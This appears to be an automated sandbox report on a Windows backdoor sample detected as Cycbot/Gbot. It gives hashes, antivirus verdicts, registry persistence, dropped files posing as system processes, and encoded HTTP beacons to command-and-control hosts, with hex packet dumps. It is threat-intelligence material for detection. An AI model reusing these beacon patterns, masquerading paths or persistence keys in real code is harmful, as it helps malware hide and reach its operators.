Analysis Date2014-07-03 00:16:32
MD5396c78b088783b42be9e9a9f5d7b8306
SHA10c960848b4a26166aa39679b4a2a41e81d267d66

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: abdbe96df09ccfaa9ef3e67f2f6eccd1 sha1: 64dbad5a0bc10e11f88e0d0a84af8c0f366b6c67 size: 138752
Section.rdata md5: 6d5c67e6b6797736c0e9734ddeccb54e sha1: 5aac7cdd2c5979290032bde868f6e3b8289f52cd size: 1536
Section.data md5: 13949fe7d5d447be34076e75ee51caa3 sha1: 719095642af8f3c142e4b54d31b85fdc58b000f3 size: 48640
Section.rsr md5: 6757fe615ffd81638b9914ae445de01c sha1: 45e93271843d91b2627a6fcd8733881b13bf2520 size: 512
Timestamp2005-09-20 05:00:27
VersionPrivateBuild: 1051
PEhash68cb97af1c3c1ffff58105767fad17c6fcdc48f0
IMPhash49906df66c2a97e9bc35871c22d49c04
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Pakes.psa
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Trojan.Pakes.gen
AVClamAVTrojan.Diple-20
AVDr. WebTrojan.Packed.21411
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Cycbot.AD
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Win32/Cryptor
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.qr
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.12724E28
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS127.0.0.1
Winsock DNSblenderartists.org
Winsock DNSzonedg.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSblenderartists.org
Type: A
162.159.251.137
DNSblenderartists.org
Type: A
198.41.249.137
DNSzonedg.com
Type: A
208.73.211.242
DNSzonedg.com
Type: A
208.73.211.193
DNSzonedg.com
Type: A
208.73.211.175
DNSzonedg.com
Type: A
208.73.211.174
DNSzonedg.com
Type: A
208.73.211.163
DNSzonetf.com
Type: A
208.73.211.174
DNSzonetf.com
Type: A
208.73.210.219
DNSzonetf.com
Type: A
208.73.211.246
DNSzonetf.com
Type: A
208.73.211.235
DNSzonetf.com
Type: A
208.73.211.233
HTTP GEThttp://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydKteuEn%2FiiWOYW6ieE3daGLUgzCwEhtUtoQ%2Frpb0LPcZoVyeEJFeXP0KmoPEY0HJF2iTRYz%2B4vKpp%2FofYC23Pl24EU5Bx3Sog8MiFYYjRIJFEdEuD3xtqR3mj%2Bov4x45lD0zyxwrAkC3h2tTsxgLRahcruEWUrgE9SDP%2BslgqLbFnSNW93qYsIahDs19usyRQyi%2BRQeI6D%2B4%2F5L%2BbS3bikM%2BTBjut8WnFp3IUlDtVWRYQ0PVwJvdc0e8E02v6j0QEBs1vz7VmM%2BsDKBhkk7mCD4h%2BOWJ9q0S2BoMJDwITrr%2B%2FEKrfrB%2B7WC1oVrEdY%2B2DyTWLcJQE9CUt
User-Agent: iamx/3.11
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQv1ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQv1ejbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvQv1ejbwvgS917W65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
Flows TCP192.168.1.1:1031 ➝ 162.159.251.137:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.242:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.242:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.174:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.242:80

Raw Pcap
0x00000000 (00000)   47455420 2f657874 65726e61 6c2f4261   GET /external/Ba
0x00000010 (00016)   6e6e6572 732f6661 6365626f 6f6b2e6a   nners/facebook.j
0x00000020 (00032)   70673f74 713d6750 34614b79 644b7465   pg?tq=gP4aKydKte
0x00000030 (00048)   75456e25 32466969 574f5957 36696545   uEn%2FiiWOYW6ieE
0x00000040 (00064)   33646147 4c55677a 43774568 7455746f   3daGLUgzCwEhtUto
0x00000050 (00080)   51253246 72706230 4c50635a 6f567965   Q%2Frpb0LPcZoVye
0x00000060 (00096)   454a4665 5850304b 6d6f5045 5930484a   EJFeXP0KmoPEY0HJ
0x00000070 (00112)   46326954 52597a25 32423476 4b707025   F2iTRYz%2B4vKpp%
0x00000080 (00128)   32466f66 59433233 506c3234 45553542   2FofYC23Pl24EU5B
0x00000090 (00144)   7833536f 67384d69 4659596a 52494a46   x3Sog8MiFYYjRIJF
0x000000a0 (00160)   45644575 44337874 7152336d 6a253242   EdEuD3xtqR3mj%2B
0x000000b0 (00176)   6f763478 34356c44 307a7978 7772416b   ov4x45lD0zyxwrAk
0x000000c0 (00192)   43336832 74547378 674c5261 68637275   C3h2tTsxgLRahcru
0x000000d0 (00208)   45575572 67453953 44502532 42736c67   EWUrgE9SDP%2Bslg
0x000000e0 (00224)   714c6246 6e534e57 39337159 73496168   qLbFnSNW93qYsIah
0x000000f0 (00240)   44733139 75737952 51796925 32425251   Ds19usyRQyi%2BRQ
0x00000100 (00256)   65493644 25324234 25324635 4c253242   eI6D%2B4%2F5L%2B
0x00000110 (00272)   62533362 696b4d25 32425442 6a757438   bS3bikM%2BTBjut8
0x00000120 (00288)   576e4670 3349556c 44745657 52595130   WnFp3IUlDtVWRYQ0
0x00000130 (00304)   5056774a 76646330 65384530 3276366a   PVwJvdc0e8E02v6j
0x00000140 (00320)   30514542 7331767a 37566d4d 25324273   0QEBs1vz7VmM%2Bs
0x00000150 (00336)   444b4268 6b6b376d 43443468 2532424f   DKBhkk7mCD4h%2BO
0x00000160 (00352)   574a3971 30533242 6f4d4a44 77495472   WJ9q0S2BoMJDwITr
0x00000170 (00368)   72253242 25324645 4b726672 42253242   r%2B%2FEKrfrB%2B
0x00000180 (00384)   37574331 6f567245 64592532 42324479   7WC1oVrEdY%2B2Dy
0x00000190 (00400)   54574c63 4a514539 43557420 48545450   TWLcJQE9CUt HTTP
0x000001a0 (00416)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x000001b0 (00432)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x000001c0 (00448)   6c656e64 65726172 74697374 732e6f72   lenderartists.or
0x000001d0 (00464)   670d0a41 63636570 743a202a 2f2a0d0a   g..Accept: */*..
0x000001e0 (00480)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000001f0 (00496)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427651 7631656a 62777667 53393137   fBvQv1ejbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a                       .11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a324273   on: close....2Bs
0x00000150 (00336)   444b4268 6b6b376d 43443468 2532424f   DKBhkk7mCD4h%2BO
0x00000160 (00352)   574a3971 30533242 6f4d4a44 77495472   WJ9q0S2BoMJDwITr
0x00000170 (00368)   72253242 25324645 4b726672 42253242   r%2B%2FEKrfrB%2B
0x00000180 (00384)   37574331 6f567245 64592532 42324479   7WC1oVrEdY%2B2Dy
0x00000190 (00400)   54574c63 4a514539 43557420 48545450   TWLcJQE9CUt HTTP
0x000001a0 (00416)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x000001b0 (00432)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x000001c0 (00448)   6c656e64 65726172 74697374 732e6f72   lenderartists.or
0x000001d0 (00464)   670d0a41 63636570 743a202a 2f2a0d0a   g..Accept: */*..
0x000001e0 (00480)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000001f0 (00496)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6d 43443468 2532424f   ose....mCD4h%2BO
0x00000160 (00352)   574a3971 30533242 6f4d4a44 77495472   WJ9q0S2BoMJDwITr
0x00000170 (00368)   72253242 25324645 4b726672 42253242   r%2B%2FEKrfrB%2B
0x00000180 (00384)   37574331 6f567245 64592532 42324479   7WC1oVrEdY%2B2Dy
0x00000190 (00400)   54574c63 4a514539 43557420 48545450   TWLcJQE9CUt HTTP
0x000001a0 (00416)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x000001b0 (00432)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x000001c0 (00448)   6c656e64 65726172 74697374 732e6f72   lenderartists.or
0x000001d0 (00464)   670d0a41 63636570 743a202a 2f2a0d0a   g..Accept: */*..
0x000001e0 (00480)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000001f0 (00496)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a443468 2532424f   close....D4h%2BO
0x00000160 (00352)   574a3971 30533242 6f4d4a44 77495472   WJ9q0S2BoMJDwITr
0x00000170 (00368)   72253242 25324645 4b726672 42253242   r%2B%2FEKrfrB%2B
0x00000180 (00384)   37574331 6f567245 64592532 42324479   7WC1oVrEdY%2B2Dy
0x00000190 (00400)   54574c63 4a514539 43557420 48545450   TWLcJQE9CUt HTTP
0x000001a0 (00416)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x000001b0 (00432)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x000001c0 (00448)   6c656e64 65726172 74697374 732e6f72   lenderartists.or
0x000001d0 (00464)   670d0a41 63636570 743a202a 2f2a0d0a   g..Accept: */*..
0x000001e0 (00480)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000001f0 (00496)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427651 7631656a 62777667 53393137   fBvQv1ejbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206961 6d782f33   er-Agent: iamx/3
0x000000a0 (00160)   2e31310d 0a0d0a44 304f704c 6a527141   .11....D0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a443468 2532424f   close....D4h%2BO
0x00000160 (00352)   574a3971 30533242 6f4d4a44 77495472   WJ9q0S2BoMJDwITr
0x00000170 (00368)   72253242 25324645 4b726672 42253242   r%2B%2FEKrfrB%2B
0x00000180 (00384)   37574331 6f567245 64592532 42324479   7WC1oVrEdY%2B2Dy
0x00000190 (00400)   54574c63 4a514539 43557420 48545450   TWLcJQE9CUt HTTP
0x000001a0 (00416)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x000001b0 (00432)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x000001c0 (00448)   6c656e64 65726172 74697374 732e6f72   lenderartists.or
0x000001d0 (00464)   670d0a41 63636570 743a202a 2f2a0d0a   g..Accept: */*..
0x000001e0 (00480)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000001f0 (00496)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a0d 0a443468 2532424f   ose......D4h%2BO
0x00000160 (00352)   574a3971 30533242 6f4d4a44 77495472   WJ9q0S2BoMJDwITr
0x00000170 (00368)   72253242 25324645 4b726672 42253242   r%2B%2FEKrfrB%2B
0x00000180 (00384)   37574331 6f567245 64592532 42324479   7WC1oVrEdY%2B2Dy
0x00000190 (00400)   54574c63 4a514539 43557420 48545450   TWLcJQE9CUt HTTP
0x000001a0 (00416)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x000001b0 (00432)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x000001c0 (00448)   6c656e64 65726172 74697374 732e6f72   lenderartists.or
0x000001d0 (00464)   670d0a41 63636570 743a202a 2f2a0d0a   g..Accept: */*..
0x000001e0 (00480)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x000001f0 (00496)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a755825 32425039 68253242 49307344   JuX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
